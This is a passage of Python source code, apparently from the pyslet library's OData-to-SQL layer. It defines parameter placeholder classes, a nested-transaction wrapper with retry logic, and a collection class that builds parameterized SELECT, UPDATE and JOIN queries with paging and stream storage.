        #: an object suitable for passing to DB API's execute method
self.params = None
def add_param(self, value):
"""Adds a value to this set of parameters
Returns the string to include in the query in place of this
value.
value:
The native representation of the value in a format
suitable for passing to the underlying DB API."""
raise NotImplementedError
@classmethod
def escape_literal(cls, literal):
"""Escapes a literal string, returning the escaped version
This method is only used to escape characters that are
interpreted specially by the parameter substitution system. For
example, if the parameters are being substituted using python's
% operator then the '%' sign needs to be escaped (by doubling)
in the output.
This method has nothing to do with turning python values into
SQL escaped literals, that task is always deferred to the
underlying DB module to prevent SQL injection attacks.
The default implementation does nothing, in most cases that is
the correct thing to do."""
return literal
class QMarkParams(SQLParams):
"""A class for building parameter lists using '?' syntax."""
def __init__(self):
super(QMarkParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return "?"
class FormatParams(SQLParams):
"""A class for building parameter lists using '%s' syntax."""
def __init__(self):
super(FormatParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return "%s"
@classmethod
def escape_literal(cls, literal):
"""Doubles any % characters to prevent formatting errors"""
return literal.replace("%", "%%")
class NumericParams(SQLParams):
"""A class for building parameter lists using ':1', ':2',... syntax"""
def __init__(self):
super(NumericParams, self).__init__()
self.params = []
def add_param(self, value):
self.params.append(value)
return ":%i" % len(self.params)
class NamedParams(SQLParams):
"""A class for building parameter lists using ':A', ':B",... syntax
Although there is more freedom with named parameters, in order to
support the ordered lists of the other formats we just invent
parameter names using ':p0', ':p1', etc."""
def __init__(self):
super(NamedParams, self).__init__()
self.params = {}
def add_param(self, value):
name = "p%i" % len(self.params)
self.params[name] = value
return ":" + name
def retry_decorator(tmethod):
"""Decorates a transaction method with retry handling"""
def retry(self, *args, **kwargs):
if self.query_count:
return tmethod(self, *args, **kwargs)
else:
strike = 0
while True:
try:
result = tmethod(self, *args, **kwargs)
break
except self.api.OperationalError as err:
strike += 1
if strike < 3:
logging.error(
"Thread[%i] retrying database connection "
"after error: %s", self.connection.thread_id,
str(err))
self.container.close_connection(self.connection.dbc)
self.connection.dbc = self.container.open()
if self.cursor is not None:
# create a new cursor
self.cursor = self.connection.dbc.cursor()
else:
raise
return result
return retry
class SQLTransaction(object):
"""Class used to model a transaction.
Python's DB API uses transactions by default, hiding the details from
the caller. Essentially, the first execute call on a connection issues
a BEGIN statement and the transaction ends with either a commit or a
rollback. It is generally considered a bad idea to issue a SQL command
and then leave the connection with an open transaction.
The purpose of this class is to help us write methods that can
    operate either as a single transaction or as part of a sequence of
    methods that form a single transaction. It also manages cursor
    creation, cursor closing and logging.
Essentially, the class is used as follows::
t = SQLTransaction(db_container, db_connection)
try:
t.begin()
t.execute("UPDATE SOME_TABLE SET SOME_COL='2'")
t.commit()
except Exception as e:
t.rollback(e)
finally:
            t.close()
The transaction object can be passed to a sub-method between the
begin and commit calls provided that method follows the same pattern
as the above for the try, except and finally blocks. The object
keeps track of these 'nested' transactions and delays the commit or
rollback until the outermost method invokes them."""
def __init__(self, container, connection):
self.container = container
self.api = container.dbapi #: the database module
self.connection = connection #: the database connection
#: the database cursor to use for executing commands
self.cursor = None
self.no_commit = 0 #: used to manage nested transactions
self.query_count = 0 #: records the number of successful commands
@retry_decorator
def begin(self):
"""Begins a transaction
If a transaction is already in progress a nested transaction is
        started which has no effect on the database connection itself."""
if self.cursor is None:
self.cursor = self.connection.dbc.cursor()
else:
self.no_commit += 1
@retry_decorator
def execute(self, sqlcmd, params=None):
"""Executes *sqlcmd* as part of this transaction.
sqlcmd
A string containing the query
params
A :py:class:`SQLParams` object containing any
parameterized values."""
self.cursor.execute(sqlcmd,
params.params if params is not None else None)
self.query_count += 1
def commit(self):
"""Ends this transaction with a commit
Nested transactions do nothing."""
if self.no_commit:
return
self.connection.dbc.commit()
def rollback(self, err=None, swallow=False):
"""Calls the underlying database connection rollback method.
Nested transactions do not rollback the connection, they do
nothing except re-raise *err* (if required).
If rollback is not supported the resulting error is absorbed.
err
The exception that triggered the rollback. If not None then
this is logged at INFO level when the rollback succeeds.
If the transaction contains at least one successfully
executed query and the rollback fails then *err* is logged
at ERROR rather than INFO level indicating that the data may
now be in violation of the model.
swallow
A flag (defaults to False) indicating that *err* should be
swallowed, rather than re-raised."""
if not self.no_commit:
try:
self.connection.dbc.rollback()
if err is not None:
logging.info(
"rollback invoked for transaction following error %s",
str(err))
except self.api.NotSupportedError:
if err is not None:
if self.query_count:
                        logging.error(
                            "Data Integrity Error: rollback "
                            "invoked on a connection that does not "
                            "support transactions after error %s",
                            str(err))
else:
logging.info(
"Query failed following error %s", str(err))
if err is not None and not swallow:
logging.debug(
' '.join(
traceback.format_exception(*sys.exc_info(), limit=6)))
if isinstance(err, self.api.Error):
raise SQLError(str(err))
else:
raise err
def close(self):
"""Closes this transaction after a rollback or commit.
Each call to :py:meth:`begin` MUST be balanced with one call to
close."""
if self.no_commit:
self.no_commit = self.no_commit - 1
elif self.cursor is not None:
self.cursor.close()
self.cursor = None
self.query_count = 0
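# Illustrative sketch (not part of pyslet): the nested-transaction pattern
# described in the SQLTransaction docstring. The function names and SQL are
# hypothetical. The sub-method follows the same begin/commit/rollback/close
# pattern but, because it is handed an existing transaction, its begin() only
# increments the nesting count and its commit() is a no-op; the real commit
# (or rollback) happens in the outer method.
def _update_parent_and_children(container, connection):
    t = SQLTransaction(container, connection)
    try:
        t.begin()
        t.execute("UPDATE Parents SET Touched=1")
        _update_children(t)
        t.commit()
    except Exception as e:
        t.rollback(e)
    finally:
        t.close()
def _update_children(t):
    try:
        t.begin()
        t.execute("UPDATE Children SET Touched=1")
        t.commit()
    except Exception as e:
        t.rollback(e)
    finally:
        t.close()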
class SQLCollectionBase(core.EntityCollection):
"""A base class to provide core SQL functionality.
Additional keyword arguments:
container
A :py:class:`SQLEntityContainer` instance.
On construction a data connection is acquired from *container*, this
may prevent other threads from using the database until the lock is
released by the :py:meth:`close` method."""
def __init__(self, container, **kwargs):
super(SQLCollectionBase, self).__init__(**kwargs)
#: the parent container (database) for this collection
self.container = container
# the quoted table name containing this collection
self.table_name = self.container.mangled_names[(self.entity_set.name,)]
self.auto_keys = False
for k in self.entity_set.keys:
source_path = (self.entity_set.name, k)
if source_path in self.container.ro_names:
self.auto_keys = True
self._joins = None
# force orderNames to be initialised
self.set_orderby(None)
#: a connection to the database acquired with
#: :meth:`SQLEntityContainer.acquire_connection`
self.connection = None
self._sqlLen = None
self._sqlGen = None
try:
self.connection = self.container.acquire_connection(SQL_TIMEOUT)
if self.connection is None:
raise DatabaseBusy(
"Failed to acquire connection after %is" % SQL_TIMEOUT)
except:
self.close()
raise
def close(self):
"""Closes the cursor and database connection if they are open."""
if self.connection is not None:
self.container.release_connection(self.connection)
self.connection = None
def __len__(self):
if self._sqlLen is None:
query = ["SELECT COUNT(*) FROM %s" % self.table_name]
params = self.container.ParamsClass()
where = self.where_clause(None, params)
query.append(self.join_clause())
query.append(where)
query = ''.join(query)
self._sqlLen = (query, params)
else:
query, params = self._sqlLen
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
# get the result
result = transaction.cursor.fetchone()[0]
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
return result
except Exception as e:
# we catch (almost) all exceptions and re-raise after rollback
transaction.rollback(e)
finally:
transaction.close()
def entity_generator(self):
entity, values = None, None
if self._sqlGen is None:
entity = self.new_entity()
query = ["SELECT "]
params = self.container.ParamsClass()
column_names, values = zip(*list(self.select_fields(entity)))
# values is used later for the first result
column_names = list(column_names)
self.orderby_cols(column_names, params)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
# we force where and orderby to be calculated before the
# join clause is added as they may add to the joins
where = self.where_clause(
None, params, use_filter=True, use_skip=False)
orderby = self.orderby_clause()
query.append(self.join_clause())
query.append(where)
query.append(orderby)
query = ''.join(query)
self._sqlGen = query, params
else:
query, params = self._sqlGen
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
while True:
row = transaction.cursor.fetchone()
if row is None:
break
if entity is None:
entity = self.new_entity()
values = next(
itertools.islice(
zip(*list(self.select_fields(entity))), 1, None))
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.exists = True
yield entity
entity, values = None, None
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def itervalues(self):
return self.expand_entities(
self.entity_generator())
def set_page(self, top, skip=0, skiptoken=None):
"""Sets the values for paging.
Our implementation uses a special format for *skiptoken*. It is
a comma-separated list of simple literal values corresponding to
the values required by the ordering augmented with the key
values to ensure uniqueness.
For example, if $orderby=A,B on an entity set with key K then
the skiptoken will typically have three values comprising the
last values returned for A,B and K in that order. In cases
where the resulting skiptoken would be unreasonably large an
additional integer (representing a further skip) may be appended
and the whole token expressed relative to an earlier skip
point."""
self.top = top
self.skip = skip
if skiptoken is None:
self.skiptoken = None
else:
# parse a sequence of literal values
p = core.Parser(skiptoken)
self.skiptoken = []
while True:
p.parse_wsp()
self.skiptoken.append(
p.require_production(p.parse_uri_literal()))
p.parse_wsp()
if not p.parse(','):
if p.match_end():
break
else:
raise core.InvalidSystemQueryOption(
"Unrecognized $skiptoken: %s" % skiptoken)
if self.orderby is None:
order_len = 0
else:
order_len = len(self.orderby)
if (len(self.skiptoken) ==
order_len + len(self.entity_set.keys) + 1):
# the last value must be an integer we add to skip
if isinstance(self.skiptoken[-1], edm.Int32Value):
self.skip += self.skiptoken[-1].value
self.skiptoken = self.skiptoken[:-1]
else:
raise core.InvalidSystemQueryOption(
"skiptoken incompatible with ordering: %s" % skiptoken)
elif len(self.skiptoken) != order_len + len(self.entity_set.keys):
raise core.InvalidSystemQueryOption(
"skiptoken incompatible with ordering: %s" % skiptoken)
self.nextSkiptoken = None
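    # Illustrative note (hypothetical values): with $orderby=Name and a single
    # key ID, a skiptoken such as "'Smith',42" resumes after the entity whose
    # (Name, ID) pair was ('Smith', 42); a token with a trailing integer, such
    # as "'Smith',42,200", additionally skips a further 200 entities relative
    # to that point.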
def next_skiptoken(self):
if self.nextSkiptoken:
token = []
for t in self.nextSkiptoken:
token.append(core.ODataURI.format_literal(t))
return ",".join(token)
else:
return None
def page_generator(self, set_next=False):
if self.top == 0:
# end of paging
return
skip = self.skip
top = self.top
topmax = self.topmax
if topmax is not None:
if top is not None:
limit = min(top, topmax)
else:
limit = topmax
else:
limit = top
entity = self.new_entity()
query = ["SELECT "]
skip, limit_clause = self.container.select_limit_clause(skip, limit)
if limit_clause:
query.append(limit_clause)
params = self.container.ParamsClass()
column_names, values = zip(*list(self.select_fields(entity)))
column_names = list(column_names)
self.orderby_cols(column_names, params, True)
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
where = self.where_clause(None, params, use_filter=True, use_skip=True)
orderby = self.orderby_clause()
query.append(self.join_clause())
query.append(where)
query.append(orderby)
skip, limit_clause = self.container.limit_clause(skip, limit)
if limit_clause:
query.append(limit_clause)
query = ''.join(query)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
while True:
row = transaction.cursor.fetchone()
if row is None:
# no more pages
if set_next:
self.top = self.skip = 0
                        self.skiptoken = None
break
if skip:
skip = skip - 1
continue
if entity is None:
entity = self.new_entity()
values = next(
itertools.islice(
zip(*list(self.select_fields(entity))), 1, None))
row_values = list(row)
for value, new_value in zip(values, row_values):
self.container.read_sql_value(value, new_value)
entity.exists = True
yield entity
if topmax is not None:
topmax = topmax - 1
if topmax < 1:
# this is the last entity, set the nextSkiptoken
order_values = row_values[-len(self.orderNames):]
self.nextSkiptoken = []
for v in order_values:
self.nextSkiptoken.append(
self.container.new_from_sql_value(v))
tokenlen = 0
for v in self.nextSkiptoken:
if v and isinstance(v, (edm.StringValue,
edm.BinaryValue)):
tokenlen += len(v.value)
# a really large skiptoken is no use to anyone
if tokenlen > 512:
# ditch this one, copy the previous one and add a
# skip
self.nextSkiptoken = list(self.skiptoken)
v = edm.Int32Value()
v.set_from_value(self.topmax)
self.nextSkiptoken.append(v)
if set_next:
self.skiptoken = self.nextSkiptoken
self.skip = 0
break
if top is not None:
top = top - 1
if top < 1:
if set_next:
if self.skip is not None:
self.skip = self.skip + self.top
else:
self.skip = self.top
break
entity = None
# we haven't changed the database, but we don't want to
# leave the connection idle in transaction
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def iterpage(self, set_next=False):
return self.expand_entities(
self.page_generator(set_next))
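    # Illustrative note: a paged read is normally driven by calling
    # set_page(top, skip, skiptoken) followed by iterating
    # iterpage(set_next=True); once the page is exhausted, next_skiptoken()
    # returns the token to hand back to the client (or None when there are
    # no further pages).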
def __getitem__(self, key):
entity = self.new_entity()
entity.set_key(key)
params = self.container.ParamsClass()
query = ["SELECT "]
column_names, values = zip(*list(self.select_fields(entity)))
query.append(", ".join(column_names))
query.append(' FROM ')
query.append(self.table_name)
where = self.where_clause(entity, params)
query.append(self.join_clause())
query.append(where)
query = ''.join(query)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" % repr(key))
for value, new_value in zip(values, row):
self.container.read_sql_value(value, new_value)
entity.exists = True
entity.expand(self.expand, self.select)
transaction.commit()
return entity
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
def read_stream(self, key, out=None):
entity = self.new_entity()
entity.set_key(key)
svalue = self._get_streamid(key)
sinfo = core.StreamInfo()
if svalue:
estream = self.container.streamstore.get_stream(svalue.value)
sinfo.type = params.MediaType.from_str(estream['mimetype'].value)
sinfo.created = estream['created'].value.with_zone(0)
sinfo.modified = estream['modified'].value.with_zone(0)
sinfo.size = estream['size'].value
sinfo.md5 = estream['md5'].value
else:
estream = None
sinfo.size = 0
sinfo.md5 = hashlib.md5(b'').digest()
if out is not None and svalue:
with self.container.streamstore.open_stream(estream, 'r') as src:
actual_size, actual_md5 = self._copy_src(src, out)
if sinfo.size is not None and sinfo.size != actual_size:
# unexpected size mismatch
raise SQLError("stream size mismatch on read %s" %
entity.get_location())
if sinfo.md5 is not None and sinfo.md5 != actual_md5:
# md5 mismatch
raise SQLError("stream checksum mismatch on read %s" %
entity.get_location())
return sinfo
def read_stream_close(self, key):
entity = self.new_entity()
entity.set_key(key)
svalue = self._get_streamid(key)
sinfo = core.StreamInfo()
if svalue:
estream = self.container.streamstore.get_stream(svalue.value)
sinfo.type = params.MediaType.from_str(estream['mimetype'].value)
sinfo.created = estream['created'].value.with_zone(0)
sinfo.modified = estream['modified'].value.with_zone(0)
sinfo.size = estream['size'].value
sinfo.md5 = estream['md5'].value
return sinfo, self._read_stream_gen(estream, sinfo)
else:
estream = None
sinfo.size = 0
            sinfo.md5 = hashlib.md5(b'').digest()
self.close()
return sinfo, []
def _read_stream_gen(self, estream, sinfo):
try:
with self.container.streamstore.open_stream(estream, 'r') as src:
h = hashlib.md5()
count = 0
while True:
data = src.read(io.DEFAULT_BUFFER_SIZE)
if len(data):
count += len(data)
h.update(data)
yield data
else:
break
if sinfo.size is not None and sinfo.size != count:
# unexpected size mismatch
raise SQLError("stream size mismatch on read [%i]" %
estream.key())
if sinfo.md5 is not None and sinfo.md5 != h.digest():
# md5 mismatch
raise SQLError("stream checksum mismatch on read [%i]" %
estream.key())
finally:
self.close()
def update_stream(self, src, key, sinfo=None):
e = self.new_entity()
e.set_key(key)
if sinfo is None:
sinfo = core.StreamInfo()
etag = e.etag_values()
if len(etag) == 1 and isinstance(etag[0], edm.BinaryValue):
h = hashlib.sha256()
etag = etag[0]
else:
h = None
c, v = self.stream_field(e, prefix=False)
if self.container.streamstore:
# spool the data into the store and store the stream key
estream = self.container.streamstore.new_stream(sinfo.type,
sinfo.created)
with self.container.streamstore.open_stream(estream, 'w') as dst:
sinfo.size, sinfo.md5 = self._copy_src(src, dst, sinfo.size, h)
if sinfo.modified is not None:
# force modified date based on input
estream['modified'].set_from_value(
sinfo.modified.shift_zone(0))
estream.commit()
v.set_from_value(estream.key())
else:
raise NotImplementedError
if h is not None:
etag.set_from_value(h.digest())
oldvalue = self._get_streamid(key)
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
# store the new stream value for the entity
query = ['UPDATE ', self.table_name, ' SET ']
params = self.container.ParamsClass()
query.append(
"%s=%s" %
(c, params.add_param(self.container.prepare_sql_value(v))))
query.append(' WHERE ')
where = []
for k, kv in dict_items(e.key_dict()):
where.append(
'%s=%s' %
(self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(kv))))
query.append(' AND '.join(where))
query = ''.join(query)
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
except Exception as e:
# we allow the stream store to re-use the same database but
# this means we can't transact on both at once (from the
# same thread) - settle for logging at the moment
# self.container.streamstore.delete_stream(estream)
logging.error("Orphan stream created %s[%i]",
estream.entity_set.name, estream.key())
transaction.rollback(e)
finally:
transaction.close()
# now remove the old stream
if oldvalue:
oldstream = self.container.streamstore.get_stream(oldvalue.value)
self.container.streamstore.delete_stream(oldstream)
def _get_streamid(self, key, transaction=None):
entity = self.new_entity()
entity.set_key(key)
params = self.container.ParamsClass()
query = ["SELECT "]
sname, svalue = self.stream_field(entity)
query.append(sname)
query.append(' FROM ')
query.append(self.table_name)
query.append(self.where_clause(entity, params, use_filter=False))
query = ''.join(query)
if transaction is None:
transaction = SQLTransaction(self.container, self.connection)
try:
transaction.begin()
logging.info("%s; %s", query, to_text(params.params))
transaction.execute(query, params)
rowcount = transaction.cursor.rowcount
row = transaction.cursor.fetchone()
if rowcount == 0 or row is None:
raise KeyError
elif rowcount > 1 or (rowcount == -1 and
transaction.cursor.fetchone() is not None):
# whoops, that was unexpected
raise SQLError(
"Integrity check failure, non-unique key: %s" % repr(key))
self.container.read_sql_value(svalue, row[0])
entity.exists = True
transaction.commit()
except Exception as e:
transaction.rollback(e)
finally:
transaction.close()
return svalue
    def _copy_src(self, src, dst, max_bytes=None, xhash=None):
        """Copies src to dst returning a (bytes copied, md5 digest) tuple.
        At most max_bytes are copied (None means copy until EOF); xhash,
        if not None, is also updated with the copied data."""
        md5 = hashlib.md5()
rbytes = max_bytes
count = 0
while rbytes is None or rbytes > 0:
if rbytes is None:
data = src.read(io.DEFAULT_BUFFER_SIZE)
else:
data = src.read(min(rbytes, io.DEFAULT_BUFFER_SIZE))
rbytes -= len(data)
if not data:
# we're done
break
# add the data to the hash
md5.update(data)
if xhash is not None:
xhash.update(data)
while data:
wbytes = dst.write(data)
if wbytes is None:
if not isinstance(dst, io.RawIOBase):
wbytes = len(data)
else:
wbytes = 0
time.sleep(0) # yield to prevent hard loop
if wbytes < len(data):
data = data[wbytes:]
else:
data = None
count += wbytes
return count, md5.digest()
def reset_joins(self):
"""Sets the base join information for this collection"""
self._joins = {}
self._aliases = set()
self._aliases.add(self.table_name)
def next_alias(self):
i = len(self._aliases)
while True:
alias = "nav%i" % i
if alias in self._aliases:
i += 1
else:
break
return alias
def add_join(self, name):
"""Adds a join to this collection
name
The name of the navigation property to traverse.
        The return value is the alias name to use for the target table.
As per the specification, the target must have multiplicity 1 or
0..1."""
if self._joins is None:
self.reset_joins()
elif name in self._joins:
return self._joins[name][0]
alias = self.next_alias()
src_multiplicity, dst_multiplicity = \
self.entity_set.get_multiplicity(name)
if dst_multiplicity not in (edm.Multiplicity.ZeroToOne,
edm.Multiplicity.One):
# we can't join on this navigation property
raise NotImplementedError(
"NavigationProperty %s.%s cannot be used in an expression" %
(self.entity_set.name, name))
fk_mapping = self.container.fk_table[self.entity_set.name]
link_end = self.entity_set.navigation[name]
target_set = self.entity_set.get_target(name)
target_table_name = self.container.mangled_names[(target_set.name, )]
join = []
if link_end in fk_mapping:
# we own the foreign key
for key_name in target_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, link_end.parent.name,
key_name)],
alias,
self.container.mangled_names[
(target_set.name, key_name)]))
join = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
else:
target_fk_mapping = self.container.fk_table[target_set.name]
if link_end.otherEnd in target_fk_mapping:
# target table has the foreign key
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias,
self.container.mangled_names[
(target_set.name,
link_end.parent.name, key_name)]))
join = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias, ' AND '.join(join))
self._joins[name] = (alias, join)
self._aliases.add(alias)
else:
# relation is in an auxiliary table
src_set, src_name, dst_set, dst_name, ukeys = \
self.container.aux_table[link_end.parent.name]
if self.entity_set is src_set:
name2 = dst_name
else:
name2 = src_name
aux_table_name = self.container.mangled_names[(
link_end.parent.name, )]
for key_name in self.entity_set.keys:
join.append(
'%s.%s=%s.%s' %
(self.table_name, self.container.mangled_names[
(self.entity_set.name, key_name)],
alias, self.container.mangled_names[
(link_end.parent.name, self.entity_set.name,
name, key_name)]))
join = ' LEFT JOIN %s AS %s ON %s' % (
aux_table_name, alias, ' AND '.join(join))
self._aliases.add(alias)
join2 = []
alias2 = self.next_alias()
for key_name in target_set.keys:
join2.append(
'%s.%s=%s.%s' %
(alias, self.container.mangled_names[
(link_end.parent.name, target_set.name,
name2, key_name)],
alias2, self.container.mangled_names[
(target_set.name, key_name)]))
join2 = ' LEFT JOIN %s AS %s ON %s' % (
target_table_name, alias2, ' AND '.join(join2))
self._aliases.add(alias2)
alias = alias2
self._joins[name] = (alias, join + join2)
return alias
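    # Illustrative note (hypothetical names): for a navigation property
    # "Category" on a Products table that owns the foreign key, the first
    # call to add_join('Category') would typically return the alias 'nav1'
    # and record a join fragment along the lines of
    #   " LEFT JOIN Categories AS nav1 ON Products.Category_ID=nav1.ID"
    # which join_clause() then appends to the generated SELECT statements.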
def join_clause(self):
"""A utility method to return the JOIN clause.
Defaults to an empty expression."""
if self._joins is None:
self.reset_joins()
return ''.join(x[1] for x in dict_values(self._joins))
def set_filter(self, filter):
self._joins = None
self.filter = filter
self.set_page(None)
self._sqlLen = None
self._sqlGen = None
def where_clause(
self,
entity,
params,
use_filter=True,
use_skip=False,
null_cols=()):
"""A utility method that generates the WHERE clause for a query
entity
An optional entity within this collection that is the focus
of this query. If not None the resulting WHERE clause will
restrict the query to this entity only.
params
The :py:class:`SQLParams` object to add parameters to.
use_filter
Defaults to True, indicates if this collection's filter should
be added to the WHERE clause.
use_skip
Defaults to False, indicates if the skiptoken should be used
in the where clause. If True then the query is limited to
entities appearing after the skiptoken's value (see below).
null_cols
An iterable of mangled column names that must be NULL (defaults
to an empty tuple). This argument is used during updates to
prevent the replacement of non-NULL foreign keys.
        The operation of the skiptoken deserves some explanation. When in
        play the skiptoken contains the last values returned for the
        ordering expressions. The ordering always includes the keys to
        ensure unambiguous ordering. The clause added is best explained
        with an example. If an entity has key K and an order expression
        such as "tolower(Name) desc" then the query will contain
        something like::
            SELECT K, Name, DOB, LOWER(Name) AS o_1, K ....
WHERE (o_1 < ? OR (o_1 = ? AND K > ?))
The values from the skiptoken will be passed as parameters."""
where = []
if entity is not None:
self.where_entity_clause(where, entity, params)
if self.filter is not None and use_filter:
# use_filter option adds the current filter too
where.append('(' + self.sql_expression(self.filter, params) + ')')
if self.skiptoken is not None and use_skip:
self.where_skiptoken_clause(where, params)
for nullCol in null_cols:
where.append('%s IS NULL' % nullCol)
if where:
return ' WHERE ' + ' AND '.join(where)
else:
return ''
def where_entity_clause(self, where, entity, params):
"""Adds the entity constraint expression to a list of SQL expressions.
where
The list to append the entity expression to.
entity
An expression is added to restrict the query to this entity"""
for k, v in dict_items(entity.key_dict()):
where.append(
'%s.%s=%s' %
(self.table_name,
self.container.mangled_names[(self.entity_set.name, k)],
params.add_param(self.container.prepare_sql_value(v))))
def where_skiptoken_clause(self, where, params):
"""Adds the entity constraint expression to a list of SQL expressions.
where
The list to append the skiptoken expression to."""
skip_expression = []
i = ket = 0
while True:
if self.orderby and i < len(self.orderby):
oname = None
expression, dir = self.orderby[i]
else:
oname, dir = self.orderNames[i]
v = self.skiptoken[i]
op = ">" if dir > 0 else "<"
if oname is None:
o_expression = self.sql_expression(expression, params, op)
else:
o_expression = oname
skip_expression.append(
"(%s %s %s" %
(o_expression,
op,
params.add_param(
self.container.prepare_sql_value(v))))
ket += 1
i += 1
if i < len(self.orderNames):
# more to come
if oname is None:
# remake the expression
o_expression = self.sql_expression(expression, params, '=')
skip_expression.append(
" OR (%s = %s AND " %
(o_expression, params.add_param(
self.container.prepare_sql_value(v))))
ket += 1
continue
else:
skip_expression.append(")" * ket)
break
where.append(''.join(skip_expression))
def set_orderby(self, orderby):
"""Sets the orderby rules for this collection.
We override the default implementation to calculate a list
of field name aliases to use in ordered queries. For example,
if the orderby expression is "tolower(Name) desc" then each SELECT
query will be generated with an additional expression, e.g.::
SELECT ID, Name, DOB, LOWER(Name) AS o_1 ...
ORDER BY o_1 DESC, ID ASC
The name "o_1" is obtained from the name mangler using the tuple::
(entity_set.name,'o_1')
Subsequent order expressions have names 'o_2', 'o_3', etc.
Notice that regardless of the ordering expression supplied the
keys are always added to ensure that, when an ordering is
required, a defined order results even at the expense of some
redundancy."""
self.orderby = orderby
self.set_page(None)
self.orderNames = []
if self.orderby is not None:
oi = 0
for expression, direction in self.orderby:
oi = oi + 1
oname = "o_%i" % oi
oname = self.container.mangled_names.get(
(self.entity_set.name, oname), oname)
self.orderNames.append((oname, direction))
for key in self.entity_set.keys:
mangled_name = self.container.mangled_names[
(self.entity_set.name, key)]
mangled_name = "%s.%s" % (self.table_name, mangled_name)
self.orderNames.append((mangled_name, 1))
self._sqlGen = None
def orderby_clause(self):
"""A utility method to return the orderby clause.
params
The :py:class:`SQLParams` object to add parameters to."""
if self.orderNames:
orderby = []
for expression, direction in self.orderNames:
orderby.append(
"%s %s" % (expression, "DESC" if direction < 0 else "ASC"))
return ' ORDER BY ' + ", ".join(orderby) + ' '
else:
return ''
def orderby_cols(self, column_names, params, force_order=False):
"""A utility to add the column names and aliases for the ordering.
column_names
A list of SQL column name/alias expressions
params
The :py:class:`SQLParams` object to add parameters to.
force_order
Forces the addition of an ordering by key if an orderby
expression has not been set."""
oname_index = 0
if self.orderby is not None:
for expression, direction in self.orderby:
oname, odir = self.orderNames[oname_index]
oname_index += 1
sql_expression = self.sql_expression(expression, params)
column_names.append("%s AS %s" % (sql_expression, oname))
if self.orderby is not None or force_order:
# add the remaining names (which are just the keys)
while oname_index < len(self.orderNames):
oname, odir = self.orderNames[oname_index]
oname_index += 1
column_names.append(oname)
def _mangle_name(self, source_path, prefix=True):
mangled_name = self.container.mangled_names[source_path]
if prefix:
mangled_name = "%s.%s" % (self.table_name, mangled_name)
return mangled_name
def insert_fields(self, entity):
"""A generator for inserting mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Read only fields are never generated, even if they are keys.
This allows automatically generated keys to be used and also
covers the more esoteric use case where a foreign key constraint
exists on the primary key (or part thereof) - in the latter case
the relationship should be marked as required to prevent
unexpected constraint violations.
Otherwise, only selected fields are yielded so if you attempt to
insert a value without selecting the key fields you can expect a
constraint violation unless the key is read only."""
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (source_path not in self.container.ro_names and
entity.is_selected(k)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix=False), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path, prefix=False), fv
def auto_fields(self, entity):
"""A generator for selecting auto mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Only fields that are read only are yielded with the caveat that
they must also be either selected or keys. The purpose of this
method is to assist with reading back automatically generated
field values after an insert or update."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (source_path in self.container.ro_names and (
entity.is_selected(k) or k in keys)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path), v
else:
for sub_path, fv in self._complex_field_generator(v):
source_path = tuple([self.entity_set.name, k] +
sub_path)
yield self._mangle_name(source_path), fv
def key_fields(self, entity):
"""A generator for selecting mangled key names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
        Only the key fields are yielded."""
for k in entity.entity_set.keys:
v = entity[k]
source_path = (self.entity_set.name, k)
yield self._mangle_name(source_path), v
def select_fields(self, entity, prefix=True):
"""A generator for selecting mangled property names and values.
entity
Any instance of :py:class:`~pyslet.odata2.csdl.Entity`
The yielded values are tuples of (mangled field name,
:py:class:`~pyslet.odata2.csdl.SimpleValue` instance).
Only selected fields are yielded with the caveat that the keys
are always selected."""
keys = entity.entity_set.keys
for k, v in entity.data_items():
source_path = (self.entity_set.name, k)
if (k in keys or entity.is_selected(k)):
if isinstance(v, edm.SimpleValue):
yield self._mangle_name(source_path, prefix), v
else:
